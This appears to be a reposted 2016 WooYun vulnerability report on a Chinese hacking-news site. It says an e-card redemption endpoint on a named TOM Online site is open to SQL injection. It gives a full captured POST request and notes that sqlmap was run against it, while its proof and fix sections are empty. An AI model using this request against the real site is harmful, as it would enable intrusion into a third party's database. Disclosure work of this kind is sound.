记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

TOM在线某重要站点存在SQL注入漏洞

2016-04-07 13:40

code 区域
POST /redeem/tom_ecardExchange.php HTTP/1.1

Content-Length: 191

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://tangyuan.tom.com/

Cookie: PHPSESSID=0bfa903262d197b1a2039b9b8ef55db0; tom_test=rPcet0oDU!4!1!1459218920!1459219309!4!0!http://tangyuan.tom.com/redeem/gamecard.php!; Hm_lvt_c8c28ae32adaa8779b879ac75b22046b=1459218921,1459218940,1459219121,1459219310; Hm_lpvt_c8c28ae32adaa8779b879ac75b22046b=1459219310; CNZZDATA2468717=cnzz_eid%3D588013179-1459218920-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1459218920; HMACCOUNT=5BE519892ACDFE21; post_key=ae99bc8d0dacbfbe74b87604e813ab93

Host: tangyuan.tom.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*



button=%c8%b7%c8%cf%b6%d2%bb%bb&bank=tomecard&card_code=94102&productid=tompay&serviceprovider=tompay&tomyzm=1&tom_name=1&tom_name2=vqdsxsxa

sqlmap最开始跑的时候有点卡,挺过去就好了~

3.png

4.png

5.png

漏洞证明:

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0191578

阅读:91942 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“TOM在线某重要站点存在SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词